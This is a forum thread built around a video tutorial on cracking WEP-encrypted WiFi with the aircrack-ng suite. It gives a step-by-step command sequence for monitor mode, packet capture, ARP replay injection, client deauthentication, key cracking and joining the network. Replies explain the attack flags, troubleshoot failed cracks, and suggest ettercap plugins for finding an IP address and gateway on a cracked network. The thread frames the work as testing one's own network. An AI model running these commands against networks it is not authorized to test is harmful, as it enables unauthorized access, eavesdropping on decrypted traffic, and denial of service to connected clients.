[Video] Cracking WiFi - WEP with a client (aircrack-ng)

[g0tmi1k]

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3129452
Download video: http://www.mediafire.com/?f17myy9vdu4fxic
What is this?
Yet another video on "How to crack WEP".


How does this work?
ARP beacon is needed (depending on the attack method), so this can be re‐injected back into the network. To get this packets the attacker needs to disconnect a connected client currently on the network (if the attacker keeps on repeating this part, it will be a DoS to the client).

Once the key beacon has been captured and enough data injected/collected, it is now an offline attack either by brute force or a dictionary attack. Then its just a question of waiting then the attacker will have the key (brute forcing WEP can be less than 60 seconds!)

From here, the attacker can use that key to decrypt the captured data from before, and now is able to ‘read’ it as well as join the network.


What do I need?
> Aircrack-ng suite
> WiFi card that supports monitor mode & injection


Software
Name: Aircrack-ng
Version: 1.0-rc3
Home Page: http://www.aircrack-ng.org/doku.php
Download Link: http://download.aircrack-ng.org/airc...1.0-rc3.tar.gz

Commands:

Code:

airmon-ng stop mon0
airmon-ng start wlan0
airodump-ng --channel 8 --write output --bssid 00:19:5B:E7:52:70 mon0

aireplay-ng --arpreplay -e g0tmi1k -b 00:19:5B:E7:52:70 -h 00:12:17:94:90:0D mon0

aireplay-ng --deauth 10 -a 00:19:5B:E7:52:70 -c 00:12:17:94:90:0D mon0

aircrack-ng output*.cap

ifconfig wlan0 down
iwconfig wlan0 essid g0tmi1k
iwconfig wlan0 key 59EF19C76A
ifconfig wlan0 up
dhclient wlan0

Notes:
If you want WPA/WPA2 PSK (with a hidden SSID) - See: http://g0tmi1k.blogspot.com/2009/07/...k-wpawpa2.html

Song: Mr. Oizo - Flat Beat
Video length: 03:50
Capture length: 07:23

Blog Post: http://g0tmi1k.blogspot.com/2010/03/...th-client.html
Forum Post: http://www.backtrack-linux.org/forum....html#post7957

[overyander]

Awesome video, thanks. So, suppose you've cracked a WEP and DHCP is disabled and you obviously need an IP and network setting to set for static. So what then? Thanks

[mastodongle]

Here's a quick reference from the aireplay-ng manpage for all the flags used in this video with aireplay-ng, so you don't have to search up and down the actual manpage to see what they mean (maybe include these in popups for future vids? ).

Filter options:
-b <bssid> MAC address of access point.
-d <dmac> MAC address of destination.
-s <smac> MAC address of source.

Replay options:
-a <bssid> Set Access Point MAC address.
-c <dmac> Set destination MAC address.
-h <smac> Set source MAC address.
-e <essid>
Fake Authentication attack: Set target SSID (see below). For
SSID containing special characters, see http://www.aircrack-
ng.org/doku.php?id=faq#how_to_use_spaces_double_quote_and _sin‐
gle_quote_etc._in_ap_names

Attack modes:
-0 <count>, --deauth=<count>
This attack sends deauthentication packets to one or more
clients which are currently associated with a particular access
point. Deauthenticating clients can be done for a number of rea‐
sons: Recovering a hidden ESSID. This is an ESSID which is not
being broadcast. Another term for this is "cloaked" or Capturing
WPA/WPA2 handshakes by forcing clients to reauthenticate or Gen‐
erate ARP requests (Windows clients sometimes flush their ARP
cache when disconnected). Of course, this attack is totally
useless if there are no associated wireless client or on fake
authentications.

-3, --arpreplay
The classic ARP request replay attack is the most effective way
to generate new initialization vectors (IVs), and works very
reliably. The program listens for an ARP packet then retransmits
it back to the access point. This, in turn, causes the access
point to repeat the ARP packet with a new IV. The program
retransmits the same ARP packet over and over. However, each ARP
packet repeated by the access point has a new IVs. It is all
these new IVs which allow you to determine the WEP key.

One question: why with the --arpreplay attack do you use -b (filter option, AP) with -h (replay option, source MAC) while with --deauth you use both replay options -a and -c ? Basically, whats the difference between the filter and replay options? I see that replay sets the addresses, but how do I know when to set vs. when to filter?

[athemak]

Hey great video. Im completely a newbie but I stumbled across backtrack and have been looking into how i works and want to test the strength of my Wi-Fi password. (Mainly because I'm paranoid and everytime my internet goes slow I assume someone has found a way in, sort of silly I know..but possible)

Right now its currently a WEP and I'm not going to change to a WPA until i can crack it. I followed your steps (which were very easy by the way) but then....

When I got to the last step where you cracked the key i got

"Failed. Next try with 30000 IVs" instead of the WEP key any ideas why?

I'm also not sure how to make it capture more IVs. I waited for time to pass and ran the aircrack command again but got the exact same message.

Edit:
Sorry just a little extra information around 2:20 of the video when Im looking at the packets sent in shell 2 is zero and im not sure why, is that important? the data is increasing in shell one though.

Update:
I finally got my own WEP code so im going to definitely upgrade to a WPA lol because it wasnt too hard. I am curious to find out why it was failing before though. This time i let the shell one run longer after the code

airmon-ng start wlan0

before using

eg. airodump-ng --channel 8 --write output --bssid 00:19:5B:E7:52:70 mon0

would that have made a difference at all or is it just a big coincidence?

[g0tmi1k]

Awesome video, thanks. So, suppose you've cracked a WEP and DHCP is disabled and you obviously need an IP and network setting to set for static. So what then? Thanks

Well you can either try and guess what the IPs are (192.168.1.1, or 192.168.0.1 or 192.168.1.254 or google
OR

There are a lot of ways to do it. For example you can use the ettercap plugin find_ip to find a free ip and the plugin gw_discover to find the gateway.
To find the ip:
ettercap -T -i interface_name -P find_ip //
To discover the gateway:
ettercap -T -i interface_name -P gw_discover

Thanks petabyte
Disabled DHCP! how to find out IP - Remote Exploit Forums

mastodongle

Here's a quick reference from the aireplay-ng manpage for all the flags used in this video with aireplay-ng, so you don't have to search up and down the actual manpage to see what they mean (maybe include these in popups for future vids? ).
...
One question: why with the --arpreplay attack do you use -b (filter option, AP) with -h (replay option, source MAC) while with --deauth you use both replay options -a and -c ? Basically, whats the difference between the filter and replay options? I see that replay sets the addresses, but how do I know when to set vs. when to filter?

Its an idea I have thought about doing, and one day I may end up doing it! anyway...
Trial and error? arpreplay ask for -b and -h, deauth ask for -a -c.

Hey great video. Im completely a newbie but I stumbled across backtrack and have been looking into how i works and want to test the strength of my Wi-Fi password. (Mainly because I'm paranoid and everytime my internet goes slow I assume someone has found a way in, sort of silly I know..but possible)

Right now its currently a WEP and I'm not going to change to a WPA until i can crack it. I followed your steps (which were very easy by the way) but then....

When I got to the last step where you cracked the key i got

"Failed. Next try with 30000 IVs" instead of the WEP key any ideas why?

I'm also not sure how to make it capture more IVs. I waited for time to pass and ran the aircrack command again but got the exact same message.

Edit:
Sorry just a little extra information around 2:20 of the video when Im looking at the packets sent in shell 2 is zero and im not sure why, is that important? the data is increasing in shell one though.

Update:
I finally got my own WEP code so im going to definitely upgrade to a WPA lol because it wasnt too hard. I am curious to find out why it was failing before though. This time i let the shell one run longer after the code

airmon-ng start wlan0

before using

eg. airodump-ng --channel 8 --write output --bssid 00:19:5B:E7:52:70 mon0

would that have made a difference at all or is it just a big coincidence?

"Failed. Next try with 30000 IVs" instead of the WEP key any ideas why?
Yep. You havnet got enough of the "right" packets. You just need to collect more

I'm also not sure how to make it capture more IVs. I waited for time to pass and ran the aircrack command again but got the exact same message.
Either wait for some activity OR generate some.

[Dandrama]

I don't get how you deside wich bassid/station to use?

[g0tmi1k]

I don't get how you deside wich bassid/station to use?

g0tmi1k - is my network (so that is the ESSID).
If you follow "g0tmi1k" across...it has "00:19:5B:E7:52:70" (as the BSSID)

Then moving down (to the client area), you see that in the "BSSID" column, one of them is the same as the BSSID from above (00:19:5B:E7:52:70). Move across to "station" - there is the MAC address of the client (00:12:17:94:90:0D) which is connect to my network (g0tmi1k)

This is what I'm doing at 0:24 - 0:57 in the video.

[hotshot247]

what does it mean when it says, "mon0 is on channel -1, but the AP uses channel 1"? how should i fix that? thanks in advance.